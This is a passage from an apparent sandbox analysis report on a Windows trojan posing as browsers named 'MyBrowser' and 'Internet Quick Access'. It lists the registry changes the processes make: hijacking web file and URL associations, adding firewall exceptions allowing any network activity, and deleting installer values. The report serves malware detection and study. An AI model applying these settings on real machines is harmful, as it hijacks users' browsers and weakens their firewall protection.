"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 1B B0 07 74 26 45 23 5E 66 36 DD DA 39 C6 F2"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the Windows Firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process setup.exe:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Chromium]
"pv" = "45.0.2433.0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ShowIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --show-icons"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"sms" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"HideIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --hide-icons"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Chromium]
"InstallerExtraCode1" = "9"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"urn" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium\Commands\on-os-upgrade]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe --on-os-upgrade --verbose-logging"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"news" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"NoModify" = "1"
[HKCU\Software\Chromium]
"InstallerSuccessLaunchCmdLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}]
"(Default)" = "CommandExecuteImpl Class"
[HKCR\.xht\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKCR\.shtml\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Chromium]
"UninstallArguments" = " --uninstall"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"https" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".webp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"irc" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium]
"ap" = "-stage:refreshing_policy"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ReinstallCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --make-default-browser"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\LocalServer32]
"ServerExecutable" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\delegate_execute.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"InstallDate" = "20151029"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium,"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Internet Quick Access"
[HKCU\Software\Chromium]
"oopcrashes" = "1"
[HKCR\.xhtml\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mailto" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Chromium]
"Name" = "Internet Quick Access"
[HKCR\.htm\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\LocalServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\delegate_execute.exe"
[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe -- %1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayName" = "Internet Quick Access"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKCU\Software\Chromium\Commands\on-os-upgrade]
"AutoRunOnOSUpgrade" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mms" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationDescription" = "Chromium is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Chromium."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 1C 04 FA C0 62 34 7C 54 3F CA CF 60 26 72 B7"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xht" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"ftp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Chromium HTML Document"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe --uninstall"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".html" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"webcal" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"Version" = "45.0.2433.0"
"Publisher" = "Internet Quick Access"
[HKCU\Software\Chromium]
"lang" = "en"
[HKLM\SOFTWARE\RegisteredApplications]
"Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = "Software\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"smsto" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCR\.html\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Chromium]
"InstallerError" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"VersionMajor" = "2433"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application"
[HKCU\Software\Chromium]
"FirstNotDefault" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"IconsVisible" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"tel" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\Startmenu]
"StartMenuInternet" = "Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"http" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium]
"InstallerResult" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"VersionMinor" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.webp\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationName" = "Internet Quick Access"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"NoRepair" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".htm" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"nntp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayVersion" = "45.0.2433.0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xhtml" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".shtml" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
Adds a rule to the Windows firewall which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application]
"Chrome.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe:*:Enabled:Internet Quick Access"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Chromium]
"InstallerExtraCode1"
"ap"
The process tmp24.tmp.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 7E 05 B8 69 B4 3B 11 4E E1 3D 0C 9C 81 58 A1"
The process nsj1B.tmp:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 26 52 E5 0B 91 09 B9 33 24 8A 54 02 07 1A ED"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process dwwin.exe:2404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F CD 2D 88 D3 02 C8 3E DD 6B CB C2 00 61 D4 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
